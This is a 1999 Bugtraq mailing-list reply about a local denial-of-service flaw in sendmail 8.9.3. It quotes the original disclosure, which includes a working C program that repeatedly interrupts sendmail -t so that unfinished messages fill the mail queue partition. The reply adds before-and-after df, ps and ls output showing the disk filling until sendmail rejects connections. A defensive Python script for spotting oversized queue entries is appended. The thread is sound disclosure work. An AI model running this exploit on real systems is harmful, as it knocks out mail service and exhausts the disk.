[10079] in bugtraq
Re: Possible local DoS in sendmail
daemon@ATHENA.MIT.EDU (KuRuPTioN)
Thu Apr 1 15:23:17 1999
Date: Thu, 1 Apr 1999 14:41:41 -0500
Reply-To: KuRuPTioN <kuruption@CHA0S.COM>
From: KuRuPTioN <kuruption@CHA0S.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.4.10.9904011342050.21573-100000@noname.kki.krakow.pl>
Well, this is very interesting... this is what I found by running this
binary for 30 seconds =)
Before:
# df /
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 87681 199909 30% /
# ps auwx | grep sendmail
root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail: accepting connections on port 25
# ls -l /var/spool/mqueue
total 0
#
After (30 seconds running):
# df /
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 107548 180042 37% /
(not too bad but another 30 seconds later another df)
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 146235 141355 51% /
# ps auwx | grep sendmail
mail 17144 70.5 0.4 1348 820 p1 R 11:35 0:48 /usr/sbin/sendmail -t
root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail: accepting connections on port 25
(sendmail kindly using 70% of my CPU)
# ls -l /var/spool/mqueue
total 115854
-rw------- 1 mail mail 118169600 Apr 1 11:37 dfLAA17144
-rw------- 1 mail mail 0 Apr 1 11:35 qfLAA17144
-rw------- 1 mail mail 0 Apr 1 11:35 xfLAA17144
(once again a df)
# df /
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 224734 62856 78% /
and once the hard drive becomes filled sendmail stops accepting connections
since it has no temp space.
# df /
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 287590 0 100% /
# ps auwx | grep sendmail
mail 17144 68.5 0.4 1348 820 p1 R 11:35 2:33 /usr/wrapped/sendmail -t
root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail: rejecting connections on port 25: min free: 100
#
People, this is no April Fools' joke =)
Raymond T Sundland
MCSE, MCP, MCP+Internet
PGP Key: finger pgp@24.3.181.22
|-----Original Message-----
|From: Bugtraq List [mailto:BUGTRAQ@NETSPACE.ORG]On Behalf Of Lukasz Luzar
|Sent: Thursday, April 01, 1999 9:00 AM
|To: BUGTRAQ@NETSPACE.ORG
|Subject: Possible local DoS in sendmail
|
|
|Hi,
|It seems that sendmail run with the -t option does NOT block SIGINT ...
|While we are sending data to its stdin and press CTRL-C, the process is
|killed, but an unfinished letter remains in the queue.
|It stays there quite long - long enough to fill up the partition on the
|disk where /var/spool/mqueue resides.
|When that happens, sendmail doesn't allow new connections - so it is a kind
|of DoS attack against this service.
|It has been tested on all new versions of sendmail up to the current one (8.9.3).
|
|Example ...
|
| --- CUT HERE ----
| #include <stdio.h>
| #include <unistd.h>
| #include <signal.h>
| #include <sys/wait.h>
|
| #define DELAY 5 /* time in seconds needed to reach
|                    MaxMessageSize limit */
| #define SM_PATH "/usr/sbin/sendmail -t"
|
| int main(void)
| {
|     FILE *fd;
|     int pid;
|
|     for(;;) {
|         if(( pid = fork()) == 0) {
|             /* child: own process group, so the signal sent by the
|                parent reaches everything started through popen() */
|             setpgrp();
|             if(( fd = popen( SM_PATH, "w")) == NULL) {
|                 fprintf( stderr, "popen error\n");
|                 return 1;
|             }
|
|             for(;;) fputc( 'A', fd);
|         } else {
|             /* parent: interrupt the child's group after DELAY seconds */
|             sleep( DELAY);
|             kill( (-1) * pid, SIGINT);
|             fprintf( stdout, "next\n");
|             wait( NULL);
|         }
|     }
| }
|--- CUT HERE ---
|
|Regards,
|
|---
|Lukasz Luzar K.K.I.
|http://noname.kki.krakow.pl/ lluzar@kki.pl
|
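
An added monitoring example (not part of either post): a queue check that flags the pattern visible in the `ls -l /var/spool/mqueue` listing above, a very large `df` body file whose `qf` control file is empty. The function names, the 10 MB threshold and the second queue entry are assumptions made for the example; the sample queue is constructed from sparse files.

```python
import os
import tempfile

def build_sample_queue(queue_dir):
    """Constructed sample: the entry from the listing plus one made-up normal message."""
    sample = {"dfLAA17144": 118169600, "qfLAA17144": 0, "xfLAA17144": 0,
              "dfLAA00001": 2048, "qfLAA00001": 312}
    for name, size in sample.items():
        with open(os.path.join(queue_dir, name), "wb") as fh:
            fh.truncate(size)  # sparse file: reports the size without using disk

def find_suspect_entries(queue_dir, max_df_bytes=10 * 1024 * 1024):
    """Return sorted (queue_id, df_size, reason) tuples for oversized bodies.

    Queue files are named <type>f<id>; df holds the body, qf the control data.
    A small df with an empty qf can be a message still being received, so only
    bodies above max_df_bytes (an assumed threshold) are reported.
    """
    sizes = {}  # queue_id -> {"df": bytes, "qf": bytes}
    for entry in os.scandir(queue_dir):
        kind, qid = entry.name[:2], entry.name[2:]
        if kind in ("df", "qf") and qid and entry.is_file(follow_symlinks=False):
            sizes.setdefault(qid, {})[kind] = entry.stat(follow_symlinks=False).st_size
    findings = []
    for qid, parts in sorted(sizes.items()):
        df_size = parts.get("df", 0)
        if df_size <= max_df_bytes:
            continue
        # Missing or zero-length qf: the body cannot be delivered, only occupy space.
        reason = "no control data" if parts.get("qf", 0) == 0 else "oversized body"
        findings.append((qid, df_size, reason))
    return findings

def free_kb(path):
    """Free space for unprivileged writers, in 1024-byte blocks as df reports it."""
    st = os.statvfs(path)
    return st.f_bavail * st.f_frsize // 1024

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as queue:
        build_sample_queue(queue)
        for qid, size, reason in find_suspect_entries(queue):
            print(f"{qid}: {size} bytes, {reason}")
        print("free KB on queue filesystem:", free_kb(queue))
```
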